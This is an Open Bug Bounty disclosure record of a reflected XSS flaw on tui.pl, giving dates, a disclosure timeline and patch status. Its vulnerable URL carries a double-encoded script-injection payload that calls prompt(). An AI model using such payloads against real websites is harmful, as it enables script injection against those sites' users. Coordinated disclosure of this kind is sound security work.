tui.pl XSS vulnerability

2016-09-09T20:08:00
ID OBB:180921
Type openbugbounty
Reporter DonkeyJJLove
Modified 2017-07-28T11:07:00

Description

Vulnerable URL:
http://www.tui.pl/narty?q=%3aprice%3ainStockFlag%3atrue%3abyPlane%3aF%3adurationFrom%3a7%3adurationTo%3a7%3actAdult%3a2%3aadditionalType%3aGT03%23TUZ-SKI%3aadditionalType%3aGT03%23TUZ-FIRSTWby91g%253c%252fscript%253e%253cscript%253eprompt%2528%252fOPENBUGBOUNTY%252f%2529%253c%252fscript%253ett1y1&page=1&pageSize=30&isGlobalSearch=true
Details:

Description| Value
---|---
Patched:| Yes, on 28.07.2017
Latest check for patch:| 28.07.2017 11:07 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 21736
VIP website status:| Yes
Check tui.pl SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 9 September, 2016 20:08 GMT
Generic security notifications sent to website owner| 9 September, 2016 20:11 GMT
Vulnerability details disclosed by researcher| 7 October, 2016 20:14 GMT
Vulnerability patched by the website owner| 28 July, 2017 11:07 GMT